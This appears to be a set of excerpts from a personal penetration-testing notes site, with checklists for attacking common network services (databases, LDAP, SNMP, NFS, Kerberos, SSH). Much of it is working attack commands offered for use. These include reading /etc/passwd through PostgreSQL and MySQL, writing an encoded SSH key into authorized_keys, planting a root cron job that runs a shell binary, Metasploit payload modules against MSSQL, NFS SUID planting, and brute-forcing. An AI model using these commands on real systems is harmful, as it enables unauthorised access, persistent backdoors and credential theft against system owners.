Enumeration Optional Brute force with nmap.
Enumeration Mandatory Try to connect. Optional Privilege escalation within PSQL to superuser: https://staaldraad.github.io/post/2020–12-15-cve-2020–25695-postgresql-privesc/ Try to read files: postgres=# CREATE TABLE demo(t text);CREATE TABLEpostgres=# COPY demo from '/etc/passwd';COPY 20postgres=# SELECT * FROM demo; Try to write a file: COPY (select convert_from(decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESWh5ZEc3aUQ5a0ZoMjJLMklmNFpyc2FvbHlINVBabkZZK3JqaXRKV3VXTGhjVTQxVWtVUEZOYVJJM1dZcVFWdlJZSlpHRTB1VkFacHJuZFJEbWJtMUVGZER0N1JLejdoQ0tJUytpTjNwMUVuVTcrOVpFVUdMTEYzc1NOTFFzalNmWTVJaTlzSWVHUU01UnltbURwdGp3VVJJaWk0Z3ErMTZzVWVnSTU4WHdlVkxIZ2R1M0wrVWJ1c2lxSHVyLy9sSy9KZTFsTnNNVnJuTXJ1dnZ6Q3dvdUNXL2ZSV1dXRGRUbXJ6MXNhbmx6N1F6QjNZS3RrdmxiNEthTE5kL20xaUJyaWtzMEkrM2Ruc3lGT1h4d1kzWkJjVHB2Q3k4ZzdueDllb28zTjJtVEVaSS83WUxIeGFWbTlMVDRzWEdDWUtUN3Z1eE1EUmZHajdYcnhQUGVUaEggcm9vdEBpbWFjMjAxOS1rYWxpCg==','base64'),'utf-8')) to '/var/lib/postgresql/.ssh/authorized_keys';
Enumeration Mandatory Try to connect within a window manager:rdesktop $target Optional If you have shell acess, try to create a new user account which is in the group Remote Desktop Users or add this group to an existing user.
Enumeration Mandatory Try to connect to the DB. Enumerate with nmap:nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target Optional If you have access to the DB: Try to read local files:SELECT load_file('/etc/passwd'); Try to write files:CREATE TABLE bbb(content TEXT);INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';
Enumeration Mandatory Determine version:nmap -p 445 --script ms-sql-info $target If credentials are known: Try to connect to the DB (alternative: IntelliJ, …):sqsh -U sa -P $password -S $target:1433 Try to execute commands:msf> use auxiliary/admin/mssql/mssql_execmsf> use windows/mssql/mssql_payload If mssql_exec doesn’t work, take care of domain/username and powershell.exe ‑command type system. Optional Brute-force login (e.g. with msf> use…
Enumeration Mandatory Check configuration:nmap -sSVC --script rmi-dumpregistry -p 1100 $target Optional Try msf> use scanner/misc/java_rmi_server if class upload is possible; if yes, try msf> use multi/misc/java_rmi_server. Try to exploit with BaRMIe.
Enumeration Mandatory Check which streams are open:nmap --script rtsp-url-brute -p 554 $target
Enumeration Mandatory Enumerate with ike-scan
See the LDAP checklist
Enumeration Mandatory Enumerate with nmap:nmap -n -sV --script "ldap* and not brute" $target Scan with LDAPsearch:ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to SSL ports:openssl s_client -connect $target:636 </dev/nullopenssl s_client -connect $target:3269 </dev/null
Detect SNMP-devices: nmap -sU --open -p 161 10.11.1.1-254 -oG mega-snmp.txt onesixtyone Brute force of community strings against IPs. The following example tries to log in into SMTP devises via a given IP and given community names. echo public > community echo private >> community echo manager >> community for ip in $(seq 1 254);do echo 10.11.1.$ip;done…
Enumeration Mandatory
Note: 139 = NetBIOS is a session layer protocol and service and different from 445 SMB. Enumeration Mandatory If you have no credentials yet: If you have already user credentials: On Windows Optional
Enumeration Mandatory Get a list of registered programs via rpcbind/v2 (previous portmapper!):rpcinfo -p $target Get a list of registered programs via rpcbind/3:rpcinfo -s $target If successful: Connect with the RPC console:rpcclient -U "" $target Enumerate with the queries on the RPC protocol post. Optional Try to brute-force accounts (no lock here!) Try other enumeration tools from the…
Enumeration Mandatory Show users and processes from known ports:ident-user-enum $target 139 445 … <- add all known ports here
Enumeration Mandatory Check if the target exposes open shares:showmount -e $target If there are some, try to mount them. If you can mount them, check if you can write files and set the s flag. (If in export no_root_squash is defined.) If yes, create a new file with a suid bit. Optional Try to use another NFS…
Enumeration Tools kerbrutepython3 /opt/kerbrute/kerbrute.py -domain thinc.local -users /usr/share/seclists/Usernames/Names/names.txt -dc-ip $target Alternative https://github.com/ropnop/kerbrute msf> use auxiliary/gather/kerberos_enumusers Perform ASREPRoast
Manual enumeration Subdomain enumeration Put usual domain names (Seclists!) and iterate them with the bash $ for ip in $(cat list.txt); do host $ip.domain.com; done IP enumeration Enumerate an IP range to find domains $ for ip in $(seq 50 100); do host 38.100.193.$ip; done | grep -v "not found" Zone transfer Perform a DNS zone…
Enumeration Mandatory Grab the banner. Tools Patator (brute force)
Notes If the server needs old crypto, use -oKexAlgorithms=+diffie-hellman-group1-sha1 OpenSSH 7.7. allows to enumerate existing users. It could be possible on Windows 10 ssh-agent to extract the keys. Keys Get fingerprints nmap -p22 --script ssh-hostkey $target Get hostkeys nmap -p22 --script ssh-hostkey --script-args ssh_hostkey=full $target Extract fingerprints from existing key file: ssh-keygen -E md5 -lf /tmp/found_keyssh-keygen -E sha1…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';